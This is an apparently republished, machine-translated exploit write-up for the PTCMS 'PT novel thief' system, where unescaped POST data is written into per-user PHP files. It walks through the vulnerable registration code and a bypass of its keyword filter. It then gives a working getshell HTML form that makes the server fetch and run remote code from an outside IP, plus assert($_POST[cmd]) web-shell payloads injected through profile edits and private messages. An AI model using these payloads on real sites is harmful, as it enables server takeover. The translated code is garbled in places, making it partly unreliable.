Ptcms PT novel thief PTNovelSteal arbitrary code written 0 day and repair

Source: Internet
Author: User

The pt novel system kills the version. Patch released officially! (Fuck !)
 
Let's get started with the following text: Here is our own communication platform, a technology sharing platform for all our 90sec members!
This set of program users do not use databases, and all user information is stored in the/data/user directory!
Create a folder based on the user name and write user registration parameters and user information in the folder. 90sec-Web Information Security Team
 
Code will not be read elsewhere, because it is similar! So. We only look at one representative:
/User/reg4.php
If (isset ($ _ POST ['dosubmit ']) {
Unset ($ _ POST ['dosubmit ']);
} Else {
Echo "<script> alert ('incorrect route! '); Location. href = 'reg. php'; </script> ";
Exit ();
}
 
Include '../inc/global. php ';
Include '../data/user. php ';
$ Username = $ _ POST ['username'];
Copy code
// Write data
$ Str = '<? Php '. "\ n ";
Foreach ($ _ POST as $ key => $ value ){
$ Str. = "\ $ key = '$ value'; \ n ";
}
$ Str. = "\ $ regdate = '". date ("Y-m-d"). "'; \ n ";
$ Str. = "?> ";
$ File = '../data/user/'. $ username. '/info. php ';
$ Result = $ pt-> writeto ($ file, $ str );
Copy code
...... Omitted
The above Code leaves only the most critical. Then we saw our lovely foreach.
Pass the POST value directly to the writeto function. Check the Code:
Common. class. php
// Generate html
Function writeto ($ filePath, $ content ){
Pt: createdir (dirname ($ filePath ));
$ Pt_html = fopen ($ filePath, 'w ');
Flock ($ pt_html, LOCK_EX );
$ Result = fwrite ($ pt_html, $ content );
Fclose ($ pt_html );
Return $ result;
}
 
// Generate a directory
Function createdir ($ dir ){
If (strpos ('\', $ dir )){
$ Dir = str_replace ('\', '/', $ dir );
}
$ Edir = explode ("/", $ dir );
For ($ I = 0; $ I <count ($ edir); $ I ++ ){
$ Edirm = $ edir [0];
For ($ ii = 1; $ ii <= $ I; $ ii ++ ){
$ Edirm = $ edirm. '/'. $ edir [$ ii];
}
If (file_exists ($ edirm) & is_dir ($ edirm )){
 
} Else {
@ Mkdir ($ edirm, 0777 );
}
}
}
Copy code
It's amazing. Write the PHP file directly. OK. Let's take a look at the usage.
First, we can directly ignore the road. This file does not have related filter functions! Let's call the file.
In Global. php
// Prevent invalid POST
If (! Empty ($ _ REQUEST )){
$ Value = implode ("", $ _ REQUEST );
If (preg_match ("/\ {| \} | fputs | fopen | base64 | eval/I", $ value) {// a keyword is added here for the patch. Of course, this vulnerability was not officially discovered to be bypassed!
Exit ('invalid operation ');
}
}
Copy code
Unrelated Code omitted. We can see that the Global filter is simple. Easy to bypass-Focus on Web Information Security 9 T, j) X7 L: c9 Q/S3 w1 l. Q4 g
Let's take a look at my EXP!
<Title> PT novel system Getshell Exploit by cfking </title>
<Form id = "QuickSearch" action = "" method = "post" name = "QuickSearch" onsubmit = "addaction ();">
Target address: <input style = "width: 400;" type = "text" name = "doaction" value = "http: // localhost/user/reg4.php"/>
<Input style = "width: 400;" type = "hidden" name = "dosubmit" value = "test"/>
Registered account: <input style = "width: 400;" type = "text" name = "cfking" value = "username"/>
Remote codes: <input style = "width: 400;" type = "text" name = "url" value = "http: // 110.110.110.110/xx.txt"/>
<Input style = "width: 400;" type = "hidden" name = "exp; assert (file_get_contents ($ url); //"/>
<Input type = "submit" name = "QuickSearchBtn" value = "submit" style = "font-size: 16px;"/>
</Form>
<Script type = "text/javascript">
Function addaction ()
{
Document. QuickSearch. action = document. QuickSearch. doaction. value;
}
</Script>
<Hr> <p> tip: After the get command is successful, the shell path is too powerful in/data/user name/info. php! Roar --! <P>
Enter eval ($ _ POST [cmd]) in the TXT text of the remote code.
<P>
Welcome to <a href = "http://www.bkjia.com/" title = "90sec Information Security Team"> www.2cto.com </a> Copy code
Another method is as follows:
After registering an account
Where can I insert www.2cto.com 'to modify my personal data?> <? Php assert ($ _ POST [cmd]);?> <? Php'
 
The shell path is in/data/user name/info.phpwww.2cto.com,
However, if GPC is enabled, it will fail. Next I will find another one!
Sending Short Messages. Writing the title or content is our own communication platform and a technology sharing platform for all our 90sec members!
<? Php assert ($ _ POST [cmd]);?>
You can win it directly.
Address pm. php

Www.2cto.com

Patch officially released

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.